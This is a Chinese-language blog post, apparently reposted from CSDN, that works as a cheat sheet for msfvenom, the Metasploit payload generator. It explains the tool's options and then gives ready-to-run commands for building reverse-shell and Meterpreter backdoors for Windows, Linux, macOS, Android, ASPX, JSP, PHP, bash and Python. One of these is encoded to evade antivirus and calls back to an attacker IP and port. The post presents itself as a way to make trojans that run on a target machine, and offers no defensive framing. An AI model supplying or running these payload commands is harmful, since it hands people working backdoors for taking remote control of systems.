msfvenom常见的使用命令

目录

简介

MSF后门生成模块

Msfvenom常用命令参数

msfvenom生成shellcode

常见生成格式


简介

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

使用说明:
-p, --payload 使用指定的payload
-l, --list [module_type] 列出指定模块可用的payloads,包括payloads、encoders、nops、all
-n, --nopsled 为payload指定一个 nopsled 长度
-f, --format 指定输出格式,如exe等
-e, --encoder 使用编码器
-a, --arch 指定payload构架(x86、x64)
--platform 指定payload平台
-s, --space 指定payload攻击荷载的最大长度
-b, --bad-chars 指定规避字符集,如: '\x00\xff‘
-i, --iterations 指定编码次数
-c, --add-code 指定一个附加的win32 shellcode 文件
-x, --template 指定一个可执行文件作为模板
-k, --keep payload自动分离并注入到新的进程
-o, --out 保存生成的payload
-v, --var-name 指定自定义变量
-h, --help 显示帮助文件

一、查看msfvenom支持的payload    msfvenom --list payload

二、查看msfvenom支持的平台         msfvenom --list platforms

三、查看msfvenom支持的编码格式  msfvenom --list encoders  其他的也是同理

MSF后门生成模块

Msfvenom常用命令参数

  1. -l, --list <type>
  2. # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platforms, archs, encrypt, formats等等
  3. -p, --payload <payload>
  4. # 指定特定的 Payload,如果被设置为 - ,那么从标准输入流中读取
  5. --list-options
  6. # 列出--payload <value> 的标准,高级和规避选项
  7. -f, --format <format>
  8. # 指定 Payload 的输出格式(使用 --list formats 列出)
  9. -e, --encoder <encoder>
  10. # 指定使用的 Encoder (使用 --list encoders 列出)
  11. --sec-name <value>
  12. # 生成大型Windows二进制文件时使用的新名称。默认值:随机4个字符的字符串
  13. --smallest
  14. # 使用所有可用的编码器生成最小的payload
  15. --encrypt <value>
  16. # 应用于shellcode的加密或编码类型 (使用--list encrypt 列出)
  17. --encrypt-key <value>
  18. # 用于加密的密钥
  19. --encrypt-iv <value>
  20. # 加密的初始化向量
  21. -a, --arch <arch>
  22. # 指定目标系统架构(使用 --list archs 列出)
  23. --platform <platform>
  24. # 指定目标系统平台 (使用 --list platforms 列出)
  25. -o, --out <path>
  26. # 保存payload文件
  27. -b, --bad-chars <list>
  28. # 设置需要在 Payload 中避免出现的字符,如: '\x00\xff'
  29. -n, --nopsled <length>
  30. # 指定 nop 在 payload 中的数量
  31. -s, --space <length>
  32. # 设置未经编码的 Payload 的最大长度
  33. --encoder-space <length>
  34. # 编码后的 Payload 的最大长度
  35. -i, --iterations <count>
  36. # 设置 Payload 的编码次数
  37. -c, --add-code <path>
  38. # 指定包含一个额外的win32 shellcode文件
  39. -x, --template <path>
  40. # 指定一个特定的可执行文件作为模板
  41. -k, --keep
  42. # 保护模板程序的功能,注入的payload作为一个新的进程运行
  43. -v, --var-name <value>
  44. # 指定一个变量名(当添加 -f 参数的时候,例如 -f python,那么输出为 python 代码, payload 会被按行格式化为 python 代码,追加到一个 python 变量中,这个参数即为指定 python 变量的变量名)
  45. -t, --timeout <second>
  46. # 设置从STDIN读取payload的等待时间(默认为30,0为禁用)
  47. -h, --help
  48. # 帮助

msfvenom生成shellcode

普通生成

  1. msfvenom -p 有效载荷 -f 输出格式 -o 输出文件
  2. msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe

编码生成

  1. msfvenom -a 系统架构 --platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件
  2. msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

msfvenom —list archs #查看支持的系统架构

  1. aarch64, armbe, armle, cbea, cbea64, cmd, dalvik, firefox, java, mips, mips64, mips64le, mipsbe, mipsle, nodejs, php, ppc, ppc64, ppc64le, ppce500v2, python, r, ruby, sparc, sparc64, tty, x64, x86, x86_64, zarch

msfvenom —list platforms #查看支持系统平台

  1. aix, android, apple_ios, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, juniper, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, r, ruby, solaris, unifi, unix, unknown, windows

msfvenom -l payload #列出所有可用的payload

msfvenom -l formats #列出所有的输出格式

msfvenom -l encrypt #列出所有的加密方式

msfvenom -l encoders #列出所有的编码器

常见生成格式

1、 Windows

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

2、Linux

msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf

3、Mac

msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho

4、Android

msfvenom -p android/meterpreter/reverse_tcp -o payload.apk

5、Aspx

msfvenom --platform windows-p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx

6、JSP

msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp

7、PHP

msfvenom -p php/meterpreter_reverse_tcp -f raw -o payload.php

8、BASH

msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh

9、Python

msfvenom -p python/meterpreter/reverse_tcp -f raw -o shell.py

猜你喜欢

转载自blog.csdn.net/m0_68012373/article/details/125451327
今日推荐